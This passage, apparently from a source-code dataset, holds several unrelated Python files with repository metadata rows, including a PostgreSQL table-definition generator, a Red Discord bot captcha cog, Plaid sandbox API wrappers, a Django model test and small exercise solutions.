if not isinstance(templatedef, bool):
errs.append('templatedef must be boolean.')
if errs:
raise ValueError('\n'.join(errs))
if std_names:
df = ColumnAttributesGenerator.StandardizeNames(df)
# Convert types:
types = PostGresColumnConverter.GetColumnTypes(df)
attributes = PostGresColumnConverter.GetColumnAttributes(df)
definition = ['CREATE TABLE %s' % tablename, '(']
if templatedef:
t_definition = ['CREATE TABLE %s_template' % tablename, '(']
for num, col in enumerate(types):
attr = attributes[col]
addl = 'NOT NULL ' if not attr['nullable'] else ''
definition.append('%s %s %s%s' % (col, types[col], addl, ',' if num != len(types) - 1 else ''))
if templatedef:
t_definition.append('%s character varying%s' % (col,',' if num != len(types) - 1 else ''))
definition.append(')')
if templatedef:
t_definition.append(')')
definition.append('\n')
definition.extend(t_definition)
if not outpath is None:
with open('%s%s.sql' % (outpath, tablename), 'w') as f:
f.write('\n'.join(definition))
else:
return '\n'.join(definition)
def ImportTableDef(self, path):
"""
* Import table definition using
file.
"""
pass
def ReadDefinitionFile(self, path):
"""
* Convert table definition file
into TableObject.
"""
pass
################
# Private Helpers:
################
############################
# Table Class:
############################
class PostGresColumnConverter(ColumnAttributesGenerator):
"""
* Map numpy dtypes to postgresql
types and attributes for usage in creating tables.
"""
# https://www.postgresql.org/docs/9.5/datatype.html
__conversionTable = {'i':{'8' : 'bigint', '4':'integer', '2':'smallint'},
'u':{'8' : 'bigint', '4':'integer', '2':'smallint'},
'b':'bool',
'f':{'8':'double precision','4':'real'},
'c':'character varying',
'm':'character varying',
'M':'character varying',
'O':'character varying',
'S':'character varying',
'U':'character varying UTF8',
'V':' ',
'?':' '}
@staticmethod
def GetColumnTypes(df):
"""
* Get column types appropriate for PostGreSQL from
numpy dtypes.
"""
if not isinstance(df, (DataFrame, Series)):
raise ValueError('df must be a pandas DataFrame or Series.')
out = {}
tps = ColumnAttributesGenerator.GetColumnTypes(df)
if isinstance(df, DataFrame):
for cell in tps:
name = cell[0]
nptp = cell[1]
if '<' in nptp:
nptp = nptp.replace('<', '')
prec = nptp[1:]
nptp = nptp[0]
tp = PostGresColumnConverter.__conversionTable[nptp][prec]
elif 'O' in nptp:
nptp = nptp.replace('|', '') if '|' in nptp else nptp
tp = PostGresColumnConverter.__conversionTable[nptp]
max_len = ColumnAttributesGenerator.GetMaxStringLen(df[name])
tp = '%s(%s)' % (tp, max_len)
else:
tp = PostGresColumnConverter.__conversionTable[nptp]
out[name] = tp
else:
name = cell[0]
nptp = cell[1]
if '<' in nptp:
nptp = nptp.replace('<', '')
prec = nptp[1:]
nptp = nptp[0]
tp = PostGresColumnConverter.__conversionTable[nptp][prec]
else:
tp = PostGresColumnConverter.__conversionTable[nptp]
out[name] = tp
return out
@staticmethod
def GetColumnAttributes(df):
"""
* Get column attributes from dataframe.
"""
return ColumnAttributesGenerator.GetColumnAttributes(df)
df = read_csv(r'C:\Shared\ETF Global\Projects\indexiq funds and basket dags\indexiq_dags\cleaned\IndexIQ_04302021_processed_constituents.csv')
df = df[[col for col in df.columns if not 'Unnamed: ' in col]]
PostGresTable.GenerateTableDef(df,'index_holdings',True,r'C:\Shared\ETF Global\Projects\indexiq funds and basket dags',True) | 37.052 | 142 | 0.542049 | 916 | 9,263 | 5.429039 | 0.257642 | 0.016087 | 0.02413 | 0.013071 | 0.207722 | 0.139151 | 0.11301 | 0.086065 | 0.063141 | 0.063141 | 0 | 0.004979 | 0.327864 | 9,263 | 250 | 143 | 37.052 | 0.793768 | 0.175861 | 0 | 0.290541 | 0 | 0.006757 | 0.143497 | 0.020376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060811 | false | 0.033784 | 0.040541 | 0 | 0.162162 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df2df1da0ca98a017a823acaaefd712f2d812056 | 2,612 | py | Python | scripts/write_NAICS_07_to_17_Crosswalk.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | scripts/write_NAICS_07_to_17_Crosswalk.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | scripts/write_NAICS_07_to_17_Crosswalk.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | # write_NAICS_from_Census.py (scripts)
# !/usr/bin/env python3
# coding=utf-8
"""
Uses a csv file manually loaded, originally from USEEIOR (4/18/2020), to form base NAICS crosswalk from 2007-2017
Loops through the source crosswalks to find any NAICS not in offical Census NAICS Code list. Adds the additional NAICS
to NAICS crosswalk.
- Writes reshaped file to datapath as csv.
"""
from flowsa.common import datapath
import glob
import pandas as pd
#from rpy2.robjects.packages import importr
#from rpy2.robjects import pandas2ri
# does not work due to issues with rpy2. Crosswalk was manually copied from useeior and added as csv (4/18/2020)
# pandas2ri.activate()
# useeior = importr('useeior')
# NAICS_crosswalk = useeior.getMasterCrosswalk(2012)
# NAICS_crosswalk = pandas2ri.ri2py_dataframe(NAICS_crosswalk)
# update the useeior crosswalk with crosswalks created for flowsa datasets
# read the csv loaded as a raw datafile
naics = pd.read_csv(datapath + "NAICS_useeior_Crosswalk.csv")
naics = naics[naics['NAICS_2007_Code'].notna()]
# convert all rows to string
naics = naics.astype(str)
missing_naics_df_list = []
# read in all the crosswalk csv files (ends in toNAICS.csv)
for file_name in glob.glob(datapath + "activitytosectormapping/"+'*_toNAICS.csv'):
df = pd.read_csv(file_name, low_memory=False)
# determine sector year
naics_year = df['SectorSourceName'].all()
# subset dataframe so only sector
df = df[['Sector']]
# trim whitespace and cast as string, rename column
df['Sector'] = df['Sector'].astype(str).str.strip()
df = df.rename(columns={'Sector': naics_year})
# extract sector year column from master crosswalk
df_naics = naics[[naics_year]]
# find any NAICS that are in source crosswalk but not in mastercrosswalk
common = df.merge(df_naics, on=[naics_year, naics_year])
missing_naics = df[(~df[naics_year].isin(common[naics_year])) & (~df[naics_year].isin(common[naics_year]))]
# append to df list
missing_naics_df_list.append(missing_naics)
# concat df list and drop duplications
missing_naics_df = pd.concat(missing_naics_df_list, ignore_index=True, sort=True).drop_duplicates()
# sort df
missing_naics_df = missing_naics_df.sort_values(['NAICS_2012_Code', 'NAICS_2007_Code'])
missing_naics_df = missing_naics_df.reset_index(drop=True)
# add missing naics to master naics crosswalk
total_naics= naics.append(missing_naics_df, sort=True)
# sort df
total_naics = total_naics.sort_values(['NAICS_2012_Code', 'NAICS_2007_Code'])
# save as csv
total_naics.to_csv(datapath + "NAICS_07_to_17_Crosswalk.csv", index=False)
| 37.855072 | 118 | 0.761103 | 395 | 2,612 | 4.848101 | 0.344304 | 0.075196 | 0.073107 | 0.028198 | 0.098172 | 0.098172 | 0.06893 | 0.037598 | 0 | 0 | 0 | 0.026257 | 0.13974 | 2,612 | 68 | 119 | 38.411765 | 0.82599 | 0.484686 | 0 | 0 | 0 | 0 | 0.157895 | 0.060259 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.130435 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df317360fd387a84ff0e026f66ae71e5d980bda4 | 495 | py | Python | djexperience/crm/tests/test_model_phoneemployee.py | rg3915/django-experience-2016 | 76adaa55c537f3b9fa48b601d4a97fd6e04371c0 | [
"MIT"
] | 1 | 2022-01-01T22:19:49.000Z | 2022-01-01T22:19:49.000Z | djexperience/crm/tests/test_model_phoneemployee.py | rg3915/django-experience-2016 | 76adaa55c537f3b9fa48b601d4a97fd6e04371c0 | [
"MIT"
] | null | null | null | djexperience/crm/tests/test_model_phoneemployee.py | rg3915/django-experience-2016 | 76adaa55c537f3b9fa48b601d4a97fd6e04371c0 | [
"MIT"
] | null | null | null | from django.test import TestCase
from djexperience.crm.models import PhoneEmployee, Employee
from .data import EMPLOYEE_DICT
class PhoneEmployeeTest(TestCase):
def setUp(self):
self.employee = Employee.objects.create(**EMPLOYEE_DICT)
phone = PhoneEmployee(
phone='11 98765-4321',
employee=self.employee,
phone_type='pri'
)
phone.save()
def test_create(self):
self.assertTrue(PhoneEmployee.objects.exists())
| 26.052632 | 64 | 0.664646 | 53 | 495 | 6.132075 | 0.528302 | 0.073846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029333 | 0.242424 | 495 | 18 | 65 | 27.5 | 0.837333 | 0 | 0 | 0 | 0 | 0 | 0.032323 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df39fdc57b5a830b3a9e319ad857dd37de453a65 | 680 | py | Python | examples/miniapps/movie-lister/movies/__main__.py | JarnoRFB/python-dependency-injector | 39f3f3a6232d846980cdf7fd106490751210d4f0 | [
"BSD-3-Clause"
] | null | null | null | examples/miniapps/movie-lister/movies/__main__.py | JarnoRFB/python-dependency-injector | 39f3f3a6232d846980cdf7fd106490751210d4f0 | [
"BSD-3-Clause"
] | null | null | null | examples/miniapps/movie-lister/movies/__main__.py | JarnoRFB/python-dependency-injector | 39f3f3a6232d846980cdf7fd106490751210d4f0 | [
"BSD-3-Clause"
] | null | null | null | """Main module."""
import sys
from dependency_injector.wiring import Provide
from .listers import MovieLister
from .containers import Container
def main(lister: MovieLister = Provide[Container.lister]) -> None:
print('Francis Lawrence movies:')
for movie in lister.movies_directed_by('Francis Lawrence'):
print('\t-', movie)
print('2016 movies:')
for movie in lister.movies_released_in(2016):
print('\t-', movie)
if __name__ == '__main__':
container = Container()
container.config.from_yaml('config.yml')
container.config.finder.type.from_env('MOVIE_FINDER_TYPE')
container.wire(modules=[sys.modules[__name__]])
main()
| 24.285714 | 66 | 0.704412 | 83 | 680 | 5.518072 | 0.457831 | 0.065502 | 0.061135 | 0.069869 | 0.122271 | 0.122271 | 0 | 0 | 0 | 0 | 0 | 0.014109 | 0.166176 | 680 | 27 | 67 | 25.185185 | 0.793651 | 0.017647 | 0 | 0.117647 | 0 | 0 | 0.140483 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.235294 | 0 | 0.294118 | 0.235294 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df3a80c657f7daf93c46d3e63b16bbedbda7ac9e | 16,502 | py | Python | captcha/base.py | Kami-DiscordBot/Predeactor-Cogs | a3b6a38a7440b58c6b229e5aa07d66f52d128eae | [
"Apache-2.0"
] | 18 | 2020-06-19T22:46:19.000Z | 2022-01-30T12:59:16.000Z | captcha/base.py | Kami-DiscordBot/Predeactor-Cogs | a3b6a38a7440b58c6b229e5aa07d66f52d128eae | [
"Apache-2.0"
] | 39 | 2020-03-09T13:36:25.000Z | 2021-08-19T00:41:39.000Z | captcha/base.py | Kami-DiscordBot/Predeactor-Cogs | a3b6a38a7440b58c6b229e5aa07d66f52d128eae | [
"Apache-2.0"
] | 17 | 2020-08-06T21:47:19.000Z | 2021-11-04T20:42:57.000Z | import logging
from contextlib import suppress
from datetime import datetime
from typing import Optional, Union
import discord
from redbot.core import Config, commands
from redbot.core.bot import Red
from redbot.core.utils.chat_formatting import bold, error, humanize_list
from .abc import CompositeMetaClass
from .api import Challenge
from .commands import OwnerCommands, Settings
from .errors import (
AlreadyHaveCaptchaError,
AskedForReload,
DeletedValueError,
LeftServerError,
MissingRequiredValueError,
)
from .events import Listeners
from .informations import (
__author__,
__patchnote__,
__patchnote_version__,
__version__,
)
from .utils import build_kick_embed
DEFAULT_GLOBAL = {"log_level": 50}
DEFAULT_GUILD = {
"channel": None, # The channel where the captcha is sent.
"logschannel": None, # Where logs are sent.
"enabled": False, # If challenges must be activated.
"autoroles": [], # Roles to give.
"temprole": None, # Temporary role to give.
"type": "plain", # Captcha type.
"timeout": 5, # Time in minutes before kicking.
"retry": 3, # The numnber of retry allowed.
}
log = logging.getLogger("red.predeactor.captcha")
class Captcha(
Settings,
OwnerCommands,
Listeners,
commands.Cog,
name="Captcha",
metaclass=CompositeMetaClass,
):
"""A Captcha defensive system. to challenge the new users and protect yourself a bit more of
raids."""
def __init__(self, bot: Red) -> None:
super().__init__()
self.bot: Red = bot
self.data: Config = Config.get_conf(None, identifier=495954056, cog_name="Captcha")
self.data.register_global(**DEFAULT_GLOBAL)
self.data.register_guild(**DEFAULT_GUILD)
self.running = {}
self.version = __version__
self.patchnote = __patchnote__
self.patchnoteconfig = None
async def send_or_update_log_message(
self,
guild: discord.Guild,
message_content: str,
message_to_update: Optional[discord.Message] = None,
*,
allowed_tries: tuple = None,
member: discord.Member = None,
file: discord.File = None,
embed: discord.Embed = None,
ignore_error: bool = True,
) -> Optional[discord.Message]:
"""
Send a message or update one in the log channel.
"""
time = datetime.now().strftime("%H:%M - %w/%d/%Y")
content = ""
if message_to_update:
content += message_to_update.content + "\n"
content += (
f"{bold(str(time))}{f' {member.mention}' if member else ''}"
f"{f' ({allowed_tries[0]}/{allowed_tries[1]})' if allowed_tries else ''}: "
f"{message_content}"
)
log_channel_id: Union[int, None] = await self.data.guild(guild).logschannel()
if not log_channel_id:
if ignore_error:
return None
raise MissingRequiredValueError("Missing logging channel ID.")
log_channel: discord.TextChannel = self.bot.get_channel(log_channel_id)
if log_channel and message_to_update:
try:
await message_to_update.edit(
content=content,
file=file,
embed=embed,
allowed_mentions=discord.AllowedMentions(users=False),
)
except discord.HTTPException:
if message_to_update.embeds and (
message_to_update.embeds[0].title == "Message reached his maximum capacity!"
):
# To avoid edit spam or something... smh
return message_to_update
await message_to_update.edit(
content=message_to_update.content,
file=file,
embed=discord.Embed(
colour=discord.Colour.red().value,
title="Message reached his maximum capacity!",
description=(
"I am unable to log more since the characters limit on this "
"message has been reached."
),
),
allowed_mentions=discord.AllowedMentions(users=False),
)
return message_to_update
if log_channel:
return await log_channel.send(
content,
file=file,
embed=embed,
allowed_mentions=discord.AllowedMentions(users=False),
)
raise DeletedValueError("Logging channel may have been deleted.")
async def basic_check(self, member: discord.Member) -> bool:
"""
Check the basis from a member; used when a member join the server.
"""
if member.bot:
return False
if await self.bot.cog_disabled_in_guild(self, member.guild):
return False
return await self.data.guild(member.guild).enabled()
async def create_challenge_for(self, member: discord.Member) -> Challenge:
"""
Create a Challenge class for an user and append it to the running challenges.
"""
if member.id in self.running:
raise AlreadyHaveCaptchaError("The user already have a captcha object running.")
captcha = Challenge(self.bot, member, await self.data.guild(member.guild).all())
self.running[member.id] = captcha
return captcha
async def delete_challenge_for(self, member: discord.Member) -> bool:
try:
del self.running[member.id]
return True
except KeyError:
return False
def is_running_challenge(self, member_or_id: Union[discord.Member, int]) -> bool:
if isinstance(member_or_id, discord.Member):
member_or_id = int(member_or_id.id)
return member_or_id in self.running
def obtain_challenge(self, member_or_id: Union[discord.Member, int]) -> Challenge:
if isinstance(member_or_id, discord.Member):
member_or_id = int(member_or_id.id)
if not self.is_running_challenge(member_or_id):
raise KeyError("User is not challenging any Captcha.")
return self.running[member_or_id]
async def give_temprole(self, challenge: Challenge) -> None:
temprole = challenge.config["temprole"]
if temprole:
try:
await challenge.member.add_roles(
challenge.guild.get_role(temprole), reason="Beginning Captcha challenge."
)
except discord.Forbidden:
raise PermissionError('Bot miss the "manage_roles" permission.')
async def remove_temprole(self, challenge: Challenge) -> None:
temprole = challenge.config["temprole"]
if temprole:
try:
await challenge.member.remove_roles(
challenge.guild.get_role(temprole), reason="Finishing Captcha challenge."
)
except discord.Forbidden:
raise PermissionError('Bot miss the "manage_roles" permission.')
async def realize_challenge(self, challenge: Challenge) -> bool:
# Seems to be the last goddamn function I'll be writing...
limit = await self.data.guild(challenge.member.guild).retry()
is_ok = None
timeout = False
await self.give_temprole(challenge)
try:
while is_ok is not True:
if challenge.trynum > limit:
break
try:
this = await challenge.try_challenging()
except TimeoutError:
timeout = True
break
except AskedForReload:
challenge.trynum += 1
continue
except LeftServerError:
return False
except TypeError:
# In this error, the user reacted with an invalid (Most probably custom)
# emoji. While I expect administrator to remove this permissions, I still
# need to handle, so we're fine if we don't increase trynum.
continue
if this is False:
challenge.trynum += 1
try:
await challenge.messages["answer"].delete()
except discord.Forbidden:
await self.send_or_update_log_message(
challenge.guild,
error(bold("Unable to delete member's answer.")),
challenge.messages.get("logs"),
member=challenge.member,
)
is_ok = False
else:
is_ok = True
failed = challenge.trynum > limit
logmsg = challenge.messages["logs"]
if failed or timeout:
reason = (
"Retried the captcha too many time."
if failed
else "Didn't answer to the challenge."
)
try:
await self.nicely_kick_user_from_challenge(challenge, reason)
await self.send_or_update_log_message(
challenge.guild,
bold(f"User kicked for reason: {reason}"),
logmsg,
member=challenge.member,
)
except PermissionError:
await self.send_or_update_log_message(
challenge.guild,
error(bold("Permission missing for kicking member!")),
logmsg,
member=challenge.member,
)
return True
roles = [
challenge.guild.get_role(role)
for role in await self.data.guild(challenge.guild).autoroles()
]
try:
await self.congratulation(challenge, roles)
await self.remove_temprole(challenge)
await self.send_or_update_log_message(
challenge.guild,
bold("Roles added, Captcha passed."),
logmsg,
member=challenge.member,
)
except PermissionError:
roles_name = [role.name for role in roles]
try:
await challenge.member.send(
f"Please contact the administrator of {challenge.guild.name} for obtaining "
"access of the server, I was unable to add you the roles on the server.\nYou "
f"should have obtained the following roles: "
f"{humanize_list(roles_name) if roles_name else 'None.'}"
)
except discord.Forbidden:
await challenge.channel.send(
challenge.member.mention
+ ": "
+ f"Please contact the administrator of {challenge.guild.name} for obtaining "
"access of the server, I was unable to add you the roles on the server.\nYou "
f"should have obtained the following roles: "
f"{humanize_list(roles_name) if roles_name else 'None.'}",
delete_after=10,
)
await self.send_or_update_log_message(
challenge.guild,
error(bold("Permission missing for giving roles! Member alerted.")),
logmsg,
member=challenge.member,
)
finally:
try:
await challenge.cleanup_messages()
except PermissionError:
await self.send_or_update_log_message(
challenge.guild,
error(bold("Missing permissions for deleting all messages for verification!")),
challenge.messages.get("logs"),
member=challenge.member,
)
return True
async def congratulation(self, challenge: Challenge, roles: list) -> None:
"""
Congrats to a member! He finished the captcha!
"""
# Admin may have set channel to be DM, checking for manage_roles is useless since
# it always return False, instead, we're taking a random text channel of the guild
# to check our permission for kicking.
channel = (
challenge.channel
if not isinstance(challenge.channel, discord.DMChannel)
else challenge.guild.text_channels[0]
)
if not channel.permissions_for(self.bot.get_guild(challenge.guild.id).me).manage_roles:
raise PermissionError('Bot miss the "manage_roles" permission.')
await challenge.member.add_roles(*roles, reason="Passed Captcha successfully.")
async def nicely_kick_user_from_challenge(self, challenge: Challenge, reason: str) -> bool:
# We're gonna check our permission first, to avoid DMing the user for nothing.
# Admin may have set channel to be DM, checking for kick_members is useless since
# it always return False, instead, we're taking a random text channel of the guild
# to check our permission for kicking.
channel = (
challenge.channel
if not isinstance(challenge.channel, discord.DMChannel)
else challenge.guild.text_channels[0]
)
if not channel.permissions_for(self.bot.get_guild(challenge.guild.id).me).kick_members:
raise PermissionError('Bot miss the "kick_members" permission.')
with suppress(discord.Forbidden, discord.HTTPException):
await challenge.member.send(embed=build_kick_embed(challenge.guild, reason))
try:
await challenge.guild.kick(challenge.member, reason=reason)
except discord.Forbidden:
raise PermissionError("Unable to kick member.")
return True
# PLEASE DON'T TOUCH THOSE FUNCTIONS WITH YOUR COG OR EVAL. Thanks. - Pred
# Those should only be used by the cog - 4 bags of None of your business.
def format_help_for_context(self, ctx: commands.Context) -> str:
"""
This will put some text at the top of the main help. ([p]help Captcha)
Thank to Sinbad.
"""
pre_processed = super().format_help_for_context(ctx)
return "{pre_processed}\n\nAuthor: {authors}\nVersion: {version}".format(
pre_processed=pre_processed,
authors=humanize_list(__author__),
version=self.version,
)
async def _initialize(self, send_patchnote: bool = True) -> None:
"""
An initializer for the cog.
It just set the logging level and send the patchnote if asked.
"""
log_level = await self.data.log_level()
log.setLevel(log_level)
log.info("Captcha logging level has been set to: {lev}".format(lev=log_level))
log.debug(
"This logging level is reserved for testing and monitoring purpose, set the "
"level to 2 if you prefer to be alerted by less minor events or doesn't want to help "
"debugging this cog."
)
if send_patchnote:
await self._send_patchnote()
async def _send_patchnote(self) -> None:
await self.bot.wait_until_red_ready()
self.patchnoteconfig = notice = Config.get_conf(
None,
identifier=4145125452,
cog_name="PredeactorNews",
)
notice.register_user(version="0")
async with notice.get_users_lock():
old_patchnote_version: str = await notice.user(self.bot.user).version()
if old_patchnote_version != __patchnote_version__:
log.info("New version of patchnote detected! Delivering... (¬‿¬ )")
await self.bot.send_to_owners(self.patchnote)
await notice.user(self.bot.user).version.set(__patchnote_version__)
def setup(bot: Red):
cog = Captcha(bot)
bot.add_cog(cog)
# noinspection PyProtectedMember
bot.loop.create_task(cog._initialize())
| 40.64532 | 102 | 0.574536 | 1,762 | 16,502 | 5.237798 | 0.212259 | 0.019504 | 0.017878 | 0.011377 | 0.352693 | 0.30545 | 0.263626 | 0.238054 | 0.232528 | 0.222993 | 0 | 0.003247 | 0.346746 | 16,502 | 405 | 103 | 40.745679 | 0.852597 | 0.081202 | 0 | 0.292169 | 0 | 0 | 0.138282 | 0.012565 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01506 | false | 0.006024 | 0.045181 | 0 | 0.114458 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df3df25b4492d882101df69a106581e2eacb1d2f | 2,392 | py | Python | frappe-bench/env/lib/python2.7/site-packages/plaid/api/sandbox.py | ibrahmm22/library-management | b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506 | [
"MIT"
] | null | null | null | frappe-bench/env/lib/python2.7/site-packages/plaid/api/sandbox.py | ibrahmm22/library-management | b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506 | [
"MIT"
] | null | null | null | frappe-bench/env/lib/python2.7/site-packages/plaid/api/sandbox.py | ibrahmm22/library-management | b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506 | [
"MIT"
] | null | null | null | from plaid.api.api import API
class Item(API):
'''Sandbox item endpoints.'''
def reset_login(self, access_token):
'''
Put an item into an ITEM_LOGIN_REQUIRED error state.
:param str access_token:
'''
return self.client.post('/sandbox/item/reset_login', {
'access_token': access_token,
})
def fire_webhook(self, access_token, webhook_code):
'''
Fire a webhook for an item
:param str access_token:
:param str webhook_code:
'''
return self.client.post('/sandbox/item/fire_webhook', {
'access_token': access_token,
'webhook_code': webhook_code,
})
class PublicToken(API):
'''Sandbox public token endpoints.'''
def create(self,
institution_id,
initial_products,
_options=None,
webhook=None,
transactions__start_date=None,
transactions__end_date=None,
):
'''
Generate a public token for sandbox testing.
:param str institution_id:
:param [str] initial_products:
:param str webhook:
'''
options = _options or {}
if webhook is not None:
options['webhook'] = webhook
transaction_options = {}
transaction_options.update(options.get('transactions', {}))
if transactions__start_date is not None:
transaction_options['start_date'] = transactions__start_date
if transactions__end_date is not None:
transaction_options['end_date'] = transactions__end_date
if transaction_options:
options['transactions'] = transaction_options
return self.client.post_public_key('/sandbox/public_token/create', {
'institution_id': institution_id,
'initial_products': initial_products,
'options': options,
})
class Sandbox(API):
'''
Sandbox-only endpoints.
(`HTTP docs <https://plaid.com/docs/api/#sandbox>`__)
These endpoints may not be used in other environments.
.. autoclass:: plaid.api.sandbox.Item
:members:
'''
def __init__(self, client):
super(Sandbox, self).__init__(client)
self.item = Item(client)
self.public_token = PublicToken(client)
| 27.813953 | 76 | 0.589465 | 247 | 2,392 | 5.433198 | 0.279352 | 0.065574 | 0.035768 | 0.044709 | 0.092399 | 0.092399 | 0 | 0 | 0 | 0 | 0 | 0 | 0.313127 | 2,392 | 85 | 77 | 28.141176 | 0.816799 | 0.231187 | 0 | 0.121951 | 0 | 0 | 0.119643 | 0.047024 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.02439 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df3e3ee51a546d9823688523e9951c6bf395670b | 483 | py | Python | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/envs/pact.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 3 | 2021-12-15T04:58:18.000Z | 2022-02-06T12:15:37.000Z | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/envs/pact.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | null | null | null | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/envs/pact.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 1 | 2019-01-02T14:38:50.000Z | 2019-01-02T14:38:50.000Z | """
Settings for Pact Verification Tests.
"""
from .test import * # pylint: disable=wildcard-import, unused-wildcard-import
#### Allow Pact Provider States URL ####
PROVIDER_STATES_URL = True
#### Default User name for Pact Requests Authentication #####
MOCK_USERNAME = 'Mock User'
######################### Add Authentication Middleware for Pact Verification Calls #########################
MIDDLEWARE = MIDDLEWARE + ['common.test.pacts.middleware.AuthenticationMiddleware', ]
| 32.2 | 109 | 0.677019 | 49 | 483 | 6.612245 | 0.612245 | 0.064815 | 0.117284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120083 | 483 | 14 | 110 | 34.5 | 0.762353 | 0.488613 | 0 | 0 | 0 | 0 | 0.362573 | 0.309942 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df3ec7382f03ff1dc0f4c5ebdc2543927a15d2f3 | 249 | py | Python | Python/Collections/Collections.OrderedDict()/solution.py | rawat9/HackerRank | 1483eee58c717ebf45fe749de6b1ad899edc13d7 | [
"MIT"
] | null | null | null | Python/Collections/Collections.OrderedDict()/solution.py | rawat9/HackerRank | 1483eee58c717ebf45fe749de6b1ad899edc13d7 | [
"MIT"
] | null | null | null | Python/Collections/Collections.OrderedDict()/solution.py | rawat9/HackerRank | 1483eee58c717ebf45fe749de6b1ad899edc13d7 | [
"MIT"
] | null | null | null | from collections import OrderedDict
n = int(input())
d = OrderedDict()
for _ in range(n):
items = input()
item_name, price = items.rsplit(" ", 1)
d[item_name] = d.get(item_name, 0) + int(price)
for k, v in d.items():
print(k, v)
| 17.785714 | 51 | 0.614458 | 40 | 249 | 3.725 | 0.55 | 0.161074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010363 | 0.2249 | 249 | 13 | 52 | 19.153846 | 0.761658 | 0 | 0 | 0 | 0 | 0 | 0.004016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df40520ca3659cc22f496aa644d7242d8e66e927 | 2,104 | py | Python | aoc24.py | juestr/aoc-2021 | 11e31f9dafd234cf4617ff596546cd7a17189f79 | [
"MIT"
] | null | null | null | aoc24.py | juestr/aoc-2021 | 11e31f9dafd234cf4617ff596546cd7a17189f79 | [
"MIT"
] | null | null | null | aoc24.py | juestr/aoc-2021 | 11e31f9dafd234cf4617ff596546cd7a17189f79 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
# This was very hard, but I attempted a blackbox general solution without
# analyzing the code by hand first.
# Trying to solve this with sympy hangs while building and simplifying
# expressions far from the required depth, and I didn't want to mess with
# better solvers.
# I had to look at the solutions thread eventually after noticing the
# regular pattern and running out of time.
